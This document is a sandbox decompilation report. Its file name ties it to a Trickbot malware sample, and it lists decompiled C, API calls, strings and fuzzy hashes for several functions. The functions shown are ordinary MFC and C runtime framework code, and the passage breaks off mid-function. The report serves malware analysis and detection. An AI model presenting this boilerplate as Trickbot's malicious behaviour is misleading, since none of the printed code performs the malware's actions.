API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 2fdecb9b09a67683d7ba5fa2e786bd8a593d361eca2dc0b4cf272eaef3c3ce83
Instruction ID: 91cbc5dec15b27557dea0b412f4debd05dd9bf17f3655276b7ccfaea848a063a
Opcode Fuzzy Hash: 2fdecb9b09a67683d7ba5fa2e786bd8a593d361eca2dc0b4cf272eaef3c3ce83
Instruction Fuzzy Hash: 2C018B33201129BBDB12AF64EC08EEF3B2CEF44710F844032F911D11A0EBB499628B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00418F5A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418F5A(intOrPtr* __ecx) {
				struct HWND__* _v36;
				struct HWND__* _v40;
				signed char _v44;
				void* _v48;
				long _t33;
				long _t41;
				struct HWND__* _t46;
				signed char _t58;
				intOrPtr* _t61;
				signed int _t62;
				void* _t67;
				intOrPtr _t69;
				intOrPtr* _t70;

				_t70 = __ecx;
				_t67 = E0041C00C();
				if(_t67 != 0) {
					if( *((intOrPtr*)(_t67 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t67 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t67 + 0x20)) == _t70) {
						 *((intOrPtr*)(_t67 + 0x20)) = 0;
					}
				}
				_t61 =  *((intOrPtr*)(_t70 + 0x30));
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 0x50))();
					 *((intOrPtr*)(_t70 + 0x30)) = 0;
				}
				_t62 =  *(_t70 + 0x34);
				_t58 = 1;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 4))(_t58);
				}
				 *(_t70 + 0x34) =  *(_t70 + 0x34) & 0x00000000;
				if(( *(_t70 + 0x24) & _t58) != 0) {
					_t69 =  *((intOrPtr*)(E00432335() + 0xcc));
					if(_t69 != 0 &&  *(_t69 + 0x1c) != 0) {
						E00405360( &_v48, 0, 0x2c);
						_t46 =  *(_t70 + 0x1c);
						_v40 = _t46;
						_v36 = _t46;
						_v48 = 0x28;
						_v44 = _t58;
						SendMessageA( *(_t69 + 0x1c), 0x405, 0,  &_v48);
					}
				}
				_t33 = GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc);
				E004187B4(_t70);
				if(GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc) == _t33) {
					_t41 =  *( *((intOrPtr*)( *_t70 + 0x80))());
					if(_t41 != 0) {
						SetWindowLongA( *(_t70 + 0x1c), 0xfffffffc, _t41);
					}
				}
				E004188CB(_t70);
				return  *((intOrPtr*)( *_t70 + 0xa4))();
			}

0x00418f63
0x00418f6a
0x00418f70
0x00418f75
0x00418f9a
0x00418f9a
0x00418fa0
0x00418fa2
0x00418fa2
0x00418fa0
0x00418fa5
0x00418faa
0x00418fae
0x00418fb1
0x00418fb1
0x00418fb4
0x00418fbb
0x00418fbc
0x00418fc1
0x00418fc1
0x00418fc4
0x00418fcb
0x00418fd2
0x00418fda
0x00418fea
0x00418fef
0x00418ff5
0x00418ff8
0x00418ffe
0x0041900d
0x00419013
0x00419013
0x00418fda
0x00419024
0x0041902a
0x00419038
0x00419044
0x00419048
0x00419050
0x00419050
0x00419048
0x00419058
0x0041906b

APIs

SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00419013
GetWindowLongA.USER32(?,000000FC), ref: 00419024
GetWindowLongA.USER32(?,000000FC), ref: 00419034
SetWindowLongA.USER32(?,000000FC,?), ref: 00419050

Strings

(, xrefs: 00418FFE

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: e785fbd2e9faaac9409ec5df27795d31915064b3830c8dcd5dde4bfbfd937210
Instruction ID: 47ea66deb5c0114beaf2568d15371b34a74f7849c5cd63fa222098a74304a788
Opcode Fuzzy Hash: e785fbd2e9faaac9409ec5df27795d31915064b3830c8dcd5dde4bfbfd937210
Instruction Fuzzy Hash: 7E319E316007009FDB21AF65D884A9EBBB5BF48314F14463EF54297691CB78EC85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00433BB8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00433BB8(void* __ecx, void* __eflags) {
				CHAR* _v8;
				char _v268;
				char _v528;
				char _v784;
				void* __ebp;
				signed char* _t35;
				intOrPtr _t39;
				intOrPtr _t43;
				CHAR* _t54;
				void* _t62;
				intOrPtr* _t63;
				void* _t64;

				_t55 = __ecx;
				_t64 = __ecx;
				_t62 = E00432562();
				 *(_t62 + 8) =  *(_t64 + 0x68);
				 *(_t62 + 0xc) =  *(_t64 + 0x68);
				GetModuleFileNameA( *(_t64 + 0x68),  &_v528, 0x104);
				_t35 = E00405F05(_t55,  &_v528, 0x2e);
				 *_t35 =  *_t35 & 0x00000000;
				_v8 = _t35;
				E00433CD5( &_v528,  &_v268, 0x104);
				if( *((intOrPtr*)(_t64 + 0x88)) == 0) {
					 *((intOrPtr*)(_t64 + 0x88)) = E004061F2( &_v268);
				}
				if( *((intOrPtr*)(_t64 + 0x78)) == 0) {
					if(E0041C702(0xe000,  &_v784, 0x100) == 0) {
						_push( *((intOrPtr*)(_t64 + 0x88)));
					} else {
						_push( &_v784);
					}
					 *((intOrPtr*)(_t64 + 0x78)) = E004061F2();
				}
				_t39 =  *((intOrPtr*)(_t64 + 0x78));
				 *((intOrPtr*)(_t62 + 0x10)) = _t39;
				_t63 = _t64 + 0x8c;
				if( *((intOrPtr*)(_t64 + 0x8c)) == 0) {
					_t54 = _v8;
					lstrcpyA(_t54, ".HLP");
					_t39 = E004061F2( &_v528);
					 *_t63 = _t39;
					 *_t54 =  *_t54 & 0x00000000;
				}
				if( *((intOrPtr*)(_t64 + 0x90)) == 0) {
					lstrcatA( &_v268, ".INI");
					_t43 = E004061F2( &_v268);
					 *((intOrPtr*)(_t64 + 0x90)) = _t43;
					return _t43;
				}
				return _t39;
			}

0x00433bb8
0x00433bc4
0x00433bcb
0x00433bd5
0x00433bdb
0x00433be9
0x00433bf8
0x00433bfd
0x00433c02
0x00433c14
0x00433c21
0x00433c30
0x00433c30
0x00433c39
0x00433c53
0x00433c5e
0x00433c55
0x00433c5b
0x00433c5b
0x00433c6a
0x00433c6a
0x00433c6d
0x00433c70
0x00433c79
0x00433c7f
0x00433c81
0x00433c8a
0x00433c97
0x00433c9c
0x00433c9e
0x00433ca1
0x00433ca9
0x00433cb7
0x00433cc4
0x00433cca
0x00000000
0x00433cca
0x00433cd4

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00433BE9

Part of subcall function 00433CD5: lstrlenA.KERNEL32(00000104,00000000,?,00433C19), ref: 00433D0C

lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00433C8A
lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00433CB7

Strings

.HLP, xrefs: 00433C84
.INI, xrefs: 00433CB1

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: FileModuleNamelstrcatlstrcpylstrlen
String ID: .HLP$.INI
API String ID: 2421895198-3011182340
Opcode ID: 3e2b42bdda4b2481fb62ea1bbb17bf545dc563a39e817a650de5c8e1f7e0231a
Instruction ID: 866fbf80d877ecd22aa45f376ffa17dbb366cc33ffb77a63ae15dcaf366ae993
Opcode Fuzzy Hash: 3e2b42bdda4b2481fb62ea1bbb17bf545dc563a39e817a650de5c8e1f7e0231a
Instruction Fuzzy Hash: 703182B24047189FDB20DFB5C885BC6B7E8AB08314F10597BE196E2191DB78AA808F14

Uniqueness

Uniqueness Score: -1.00%

Function 004051A7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 83%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t27;
				signed int _t35;
				intOrPtr _t52;

				_t47 = __edi;
				_push(0xffffffff);
				_push(0x43e4c0);
				_push(E004070AC);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(__edi);
				_v28 = _t52 - 0x58;
				_t15 = GetVersion();
				 *0x44b760 = 0;
				_t35 = _t15 & 0x000000ff;
				 *0x44b75c = _t35;
				 *0x44b758 = _t35 << 8;
				 *0x44b754 = _t15 >> 0x10;
				if(E0040815F(1) == 0) {
					E004052D4(0x1c);
				}
				if(E00407AAC() == 0) {
					E004052D4(0x10);
				}
				_v8 = 0;
				E004092E2();
				 *0x44d2f8 = GetCommandLineA();
				 *0x44b744 = E004091B0();
				E00408F63();
				E00408EAA();
				E0040621D();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E00408E52();
				_t56 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
				}
				_v100 = E00413D27(GetModuleHandleA(0), 0, _v104, _t27);
				E0040624A(_t29);
				_t31 = _v24;
				_t40 =  *((intOrPtr*)( *_v24));
				_v108 =  *((intOrPtr*)( *_v24));
				return E00408CDA(_t47, _t56, _t40, _t31);
			}

0x004051a7
0x004051aa
0x004051ac
0x004051b1
0x004051bc
0x004051bd
0x004051c9
0x004051ca
0x004051cd
0x004051d7
0x004051df
0x004051e5
0x004051f0
0x004051f9
0x00405208
0x0040520c
0x00405211
0x00405219
0x0040521d
0x00405222
0x00405225
0x00405228
0x00405233
0x0040523d
0x00405242
0x00405247
0x0040524c
0x00405251
0x00405258
0x00405263
0x00405266
0x0040526a
0x00405274
0x0040526c
0x0040526c
0x0040526c
0x00405287
0x0040528b
0x00405290
0x00405295
0x00405297
0x004052a3

APIs

GetVersion.KERNEL32 ref: 004051CD

Part of subcall function 0040815F: HeapCreate.KERNELBASE(00000000,00001000,00000000,00405205,00000001), ref: 00408170
Part of subcall function 0040815F: HeapDestroy.KERNEL32 ref: 0040818E

GetCommandLineA.KERNEL32 ref: 0040522D
GetStartupInfoA.KERNEL32(?), ref: 00405258
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040527B

Part of subcall function 004052D4: ExitProcess.KERNEL32 ref: 004052F1

Strings

^<, xrefs: 00405247

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID: ^<
API String ID: 2057626494-3676403682
Opcode ID: 73b449356f71fd1c36e44c95f46d965c128b046a3380e9522ed4288eceeb63a0
Instruction ID: e6019f4a9cb0f5a20fc7bacbca297649c9a311edd79f13838cb342d8e4dfe181
Opcode Fuzzy Hash: 73b449356f71fd1c36e44c95f46d965c128b046a3380e9522ed4288eceeb63a0
Instruction Fuzzy Hash: 552185B1940705AADB04BFB6DD45A6E77A8EF45704F10457FF505AA2D1DB7C8800CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0042E226, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042E226(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E00419EDA(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x68));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0x90) =  *(_t45 + 0x90) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0x90) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0x90) = _t42;
								L17:
								 *(_t38 + 0x24) =  *(_t38 + 0x24) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0x90);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0x94))) {
									L21:
									return _t30;
								}
								_t30 = E0041884D(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x24) =  *(_t45 + 0x24) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x50)) != 0) {
						 *(_t45 + 0x90) = 0xe002;
					} else {
						 *(_t45 + 0x90) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0x90), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0xd4))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}

0x0042e22c
0x0042e22e
0x0042e233
0x0042e236
0x0042e23b
0x0042e23d
0x0042e253
0x0042e25a
0x0042e2ad
0x0042e2f2
0x00000000
0x0042e2b7
0x0042e2bd
0x0042e2e4
0x00000000
0x00000000
0x0042e2e6
0x00000000
0x0042e2c7
0x0042e2d0
0x0042e2d6
0x0042e2d6
0x0042e2f9
0x0042e2f9
0x0042e2fd
0x0042e2fd
0x0042e309
0x0042e334
0x0042e334
0x0042e334
0x0042e315
0x0042e31c
0x00000000
0x00000000
0x00000000
0x0042e32a
0x0042e2bd
0x0042e2ad
0x0042e25c
0x0042e264
0x0042e272
0x0042e266
0x0042e266
0x0042e266
0x0042e28c
0x0042e296
0x0042e29e
0x0042e2a3
0x0042e2a3
0x00000000
0x0042e29e
0x0042e248
0x0042e24d
0x00000000
0x00000000
0x00000000

APIs

SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 0042E28C
UpdateWindow.USER32(?), ref: 0042E2A3
GetParent.USER32(?), ref: 0042E30E
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 0042E32A

Strings

@, xrefs: 0042E2F9

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Message$ParentPostSendUpdateWindow
String ID: @
API String ID: 4141989945-2766056989
Opcode ID: 026d1a49b3b74bc12d7a726dc7d4ff865367001d19cd3f2edc97a7a7140d0056
Instruction ID: 84df0b17e537a4fee327fd4ea2838260a3a3e6ca4d0f6bfb0a5965ea62d3eb95
Opcode Fuzzy Hash: 026d1a49b3b74bc12d7a726dc7d4ff865367001d19cd3f2edc97a7a7140d0056
Instruction Fuzzy Hash: 1C31A732700710DFDB304F26E809BA677A9BF45311F50496EE55B562E1C7B998409B28

Uniqueness

Uniqueness Score: -1.00%

Function 00419472, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00419472(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t25;
				intOrPtr _t37;
				struct HINSTANCE__* _t40;
				CHAR* _t42;

				_t42 = E00432335() + 0x58;
				_t25 = E00432562();
				_t37 = _a8;
				_t40 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37 || _a16 != _t37) {
					wsprintfA(_t42, "Afx:%x:%x:%x:%x:%x", _t40, _a4, _t37, _a12, _a16);
				} else {
					wsprintfA(_t42, "Afx:%x:%x", _t40, _a4);
				}
				if(GetClassInfoA(_t40, _t42,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_t39 = _a12;
					_push( &_v44);
					_v44.hInstance = _t40;
					_v44.hCursor = _t37;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t42;
					if(E004193D1() == 0) {
						E00421855(_t39);
					}
				}
				return _t42;
			}

0x00419482
0x00419485
0x0041948a
0x0041948d
0x00419492
0x004194c4
0x0041949e
0x004194a8
0x004194ae
0x004194db
0x004194e3
0x004194eb
0x004194f0
0x004194f3
0x004194f6
0x004194f9
0x004194fc
0x00419502
0x00419503
0x00419506
0x00419509
0x0041950c
0x00419516
0x00419518
0x00419518
0x00419516
0x00419523

APIs

wsprintfA.USER32 ref: 004194A8
wsprintfA.USER32 ref: 004194C4
GetClassInfoA.USER32(?,-00000058,?), ref: 004194D3

Strings

Afx:%x:%x, xrefs: 004194A2
Afx:%x:%x:%x:%x:%x, xrefs: 004194BE

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: wsprintf$ClassInfo
String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
API String ID: 845911565-79760390
Opcode ID: 498860d913ed8ffdabd7c25154fd2171b7b2e186e8da2bf643e1d5db791e0582
Instruction ID: a9929ff29f41f64b48bd27a5967130d3b11607c2636f791f8f05cb3f3b4f515f
Opcode Fuzzy Hash: 498860d913ed8ffdabd7c25154fd2171b7b2e186e8da2bf643e1d5db791e0582
Instruction Fuzzy Hash: 74213E7190020AAF8F11DF99DD809EF7BB8FF58354F00402AF905E2200D7789E51CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004172E4, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004172E4(void* __ecx, void* __eflags, struct HWND__** _a4) {
				void* _t10;
				void* _t11;
				struct HWND__* _t13;
				struct HWND__* _t16;
				struct HWND__** _t23;
				void* _t24;

				_t23 = _a4;
				_t24 = __ecx;
				if(E00419115(__ecx, _t23) != 0) {
					L12:
					_t10 = 1;
					return _t10;
				}
				_t11 = E00419EDA(__ecx);
				if(_t11 == 0 ||  *((intOrPtr*)(_t11 + 0x50)) == 0) {
					if(_t23[1] != 0x100) {
						L13:
						return E0041AFF4(_t23);
					}
					_t13 = _t23[2];
					if(_t13 == 0x1b || _t13 == 3) {
						if((GetWindowLongA( *_t23, 0xfffffff0) & 0x00000004) == 0 || E00422608( *_t23, ?str?) == 0) {
							goto L13;
						} else {
							_t16 = GetDlgItem( *(_t24 + 0x1c), 2);
							if(_t16 == 0 || IsWindowEnabled(_t16) != 0) {
								SendMessageA( *(_t24 + 0x1c), 0x111, 2, 0);
								goto L12;
							} else {
								goto L13;
							}
						}
					} else {
						goto L13;
					}
				} else {
					return 0;
				}
			}

0x004172e6
0x004172ea
0x004172f4
0x0041736b
0x0041736d
0x00000000
0x0041736d
0x004172f8
0x004172ff
0x00417312
0x00417370
0x00000000
0x00417373
0x00417314
0x0041731a
0x0041732d
0x00000000
0x0041733f
0x00417344
0x0041734c
0x00417365
0x00000000
0x00000000
0x00000000
0x00000000
0x0041734c
0x00000000
0x00000000
0x00000000
0x00417307
0x00000000
0x00417307

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00417325
GetDlgItem.USER32(?,00000002), ref: 00417344
IsWindowEnabled.USER32(00000000), ref: 0041734F
SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00417365

Strings

Edit, xrefs: 0041732F

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: 2e97bd6a298735bd052a9eba0b3ddb870d06f98e164f70851eb92861cabac885
Instruction ID: 286ddf120a1f1e937f7bb08519e7a9a55c421e14a63c3d15613720783f553d7a
Opcode Fuzzy Hash: 2e97bd6a298735bd052a9eba0b3ddb870d06f98e164f70851eb92861cabac885
Instruction Fuzzy Hash: 0701C035348205BAEB311B258C4ABEBA3B4AB00751F14452BFD22D12E1CBA8DCD1E51C

Uniqueness

Uniqueness Score: -1.00%

Function 00421438, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00421438(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}

0x0042143a
0x00421441
0x0042144d
0x0042144f
0x00421457
0x0042146a
0x0042146e
0x00421471
0x00421471
0x00421459
0x00421462
0x00421462
0x0042147b

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,00429D47,00000000), ref: 00421441
GetProcAddress.KERNEL32(00000000,SetLayout,?,?,00429D47,00000000), ref: 0042144F
SetLastError.KERNEL32(00000078,?,?,00429D47,00000000), ref: 00421471

Strings

GDI32.DLL, xrefs: 0042143C
SetLayout, xrefs: 00421447

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$SetLayout
API String ID: 4275029093-2147214759
Opcode ID: b06dd9651575d921d81a9f50bf498ea56dcb781289048d11a83ad6aaf08a996c
Instruction ID: 80d238ecbf5e6c208c8ba6125b74836563e3af87c037aec0b6a4138e775a06ea
Opcode Fuzzy Hash: b06dd9651575d921d81a9f50bf498ea56dcb781289048d11a83ad6aaf08a996c
Instruction Fuzzy Hash: 76E0D8333001106F82606B56AC0D92BBB52DBD8721F59DA3BF679D11E0CBB84C428E69

Uniqueness

Uniqueness Score: -1.00%

Function 00421402, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00421402(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}

0x00421403
0x00421416
0x0042141e
0x0042142b
0x0042142e
0x00421420
0x00421425
0x00421425
0x00421437

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,00429D3A), ref: 0042140A
GetProcAddress.KERNEL32(00000000,GetLayout), ref: 00421416
SetLastError.KERNEL32(00000078), ref: 0042142E

Strings

GetLayout, xrefs: 00421410
GDI32.DLL, xrefs: 00421405

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$GetLayout
API String ID: 4275029093-2396518106
Opcode ID: 7e88a80ef0d530e7520ed6d9e410f5b791acb66a8abef4ef68857315e5571575
Instruction ID: dbc387a5ede6bf86417f8611c33ad3f829814c0e893832b321db5ad764ba88ce
Opcode Fuzzy Hash: 7e88a80ef0d530e7520ed6d9e410f5b791acb66a8abef4ef68857315e5571575
Instruction Fuzzy Hash: 97D05B317415306BC7602BA4BD0D7977758DB0C761759667ABD2AE21E0CFD88C4047D8

Uniqueness

Uniqueness Score: -1.00%

Function 00429D0F, Relevance: 7.8, APIs: 5, Instructions: 339
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00429D0F(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				long _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				intOrPtr _t150;
				intOrPtr* _t155;
				intOrPtr _t161;
				void* _t162;
				signed int _t165;
				signed int _t167;
				signed int _t171;
				signed int _t173;
				long _t191;
				intOrPtr* _t198;
				intOrPtr* _t200;
				long _t202;
				intOrPtr* _t209;
				intOrPtr* _t211;
				intOrPtr* _t214;
				long _t216;
				void* _t219;
				signed char _t222;
				intOrPtr _t225;
				intOrPtr _t236;
				intOrPtr _t242;
				char* _t248;
				struct tagRECT* _t263;
				intOrPtr* _t279;
				signed int _t281;
				long _t283;
				void* _t287;
				intOrPtr _t291;
				intOrPtr _t308;

				_t219 = __ecx;
				 *((intOrPtr*)(__ecx + 0x88)) = 1;
				E0042A5EE(__ecx);
				_t279 = __ecx + 0x84;
				if((E00421402( *((intOrPtr*)(__ecx + 0x84))) & 0x00000001) != 0) {
					E00421438( *_t279, 0);
				}
				_t150 =  *((intOrPtr*)(_t219 + 0x68));
				_t222 =  *(_t150 + 0x64);
				if((_t222 & 0x00000004) == 0) {
					if((_t222 & 0x00000002) == 0) {
						GetWindowRect( *(_t150 + 0x1c),  &_v44);
						_t281 =  *(_t219 + 0x78) & 0x0000a000;
						 *((intOrPtr*)(_t219 + 4)) = _a4;
						asm("sbb edx, edx");
						 *((intOrPtr*)(_t219 + 8)) = _a8;
						_t248 =  &_v20;
						_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))(_t248, 0xffffffff, ( ~_t281 & 0x00000006) + 0xa);
						_t225 =  *_t155;
						_v8 =  *((intOrPtr*)(_t155 + 4));
						if(_t281 == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
